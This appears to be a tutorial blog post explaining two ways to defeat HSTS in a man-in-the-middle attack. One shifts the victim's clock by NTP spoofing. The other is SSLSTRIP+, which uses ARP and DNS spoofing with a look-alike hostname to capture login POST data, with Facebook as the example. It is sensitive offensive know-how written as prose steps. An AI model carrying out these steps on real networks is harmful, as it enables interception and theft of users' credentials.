Bypassing HTTP Strict Transport Security

A guide to (targeted) MITM attacks on HSTS protected web services

The views and opinions expressed in this document are those of the author. All material provided is intended for informational and learning purposes only and should never be used on a production environment.

HTTP Strict Transport Security (HSTS) is a security feature through the use of a response header. Once a browser receives this header, it forces a secure connection (using SSL) for that specific website, until the “max-age” value in the header is exceeded. This prevents hackers from stripping HTTPS links during a man-in-the-middle attack, like Moxie Marlinspike demonstrated at Black Hat DC 2009. Without HSTS, a hacker could replace all HTTPS links with HTTP links to keep victims on an unencrypted connection (with all its consequences).

A sample HSTS header (which works for a year in this case, because 31536000 seconds equals 1 year) would look like this:

Strict-Transport-Security: max-age=31536000

Up to now, I know two methods to bypass this security feature. Both methods require the victim to initiate the connection using http.

Method 1 (intermediate, works sometimes)

The first method requires changing the victims time on his/her computer. This can be accomplished by doing a MITM attack on the Network Time Protocol (NTP). Jose Selvi discovered this vulnerability when doing research on HSTS. The main idea behind it, is to change the date to 1 or 2 years in the future and keeping the month, day and time the same. This way, the victim probably won't notice the change, although the HSTS header did expire (yes, the max-age parameter is based on the victims time settings). The attacker can then keep the victim on an unencrypted connection by stripping https links. I did find some articles on the web with fixes on several NTP vulnerabilities in OS X and Linux. I didn't check if this method is still working, so you should check yourself if you're planning to use it!

Method 2 (intermediate, should always work)

The second method is a bit more complicated. It requires changing the hostname of the website. For example www.facebook.com to wwww.facebook.com. You can do this with DNS spoofing. This method of bypassing HSTS was introduced by Leonardo Nve at Black Hat Asia 2014 and is called SSLSTRIP+. Make sure the website (www.facebook.com in this case) does not contain "includeSubdomains" in the HSTS header. If it does, HSTS will also be applied on all subdomains, so you need to choose another hostname (like www.faceboook.com). A HSTS header with "includeSubdomains" looks like this:

Strict-Transport-Security: max-age=31536000; includeSubDomains

First you need make sure the victim sees you as the router, using something like ARP spoofing. After that, you can use dns2proxy to create a fake host like wwww.facebook.com. To explain the rest of the steps as good as possible, I will divide it into steps.

  • Once the victim queries www.facebook.com, SSLSTRIP+ will respond with a malformed DNS packet with the hostname: wwww.facebook.com (this happens at the network layer, using DNS spoofing)
  • The victim requests the content of wwww.facebook.com using the IP from the DNS packet
  • SSLSTRIP+ will intercept it and get the content of the original site (www.facebook.com) and return it to the victim
  • When the victim tries to login, he/she will send post data to wwww.facebook.com
  • The attacker will again intercept this request
    • If the victim's request method is post, SSLSTRIP+ will log the post data
    • SSLSTRIP+ will replicate this request and send it to www.facebook.com
    • SSLSTRIP+ replaces all the https links from the response with http links
    • SSLSTRIP+ returns the stripped www.facebook.com as wwww.facebook.com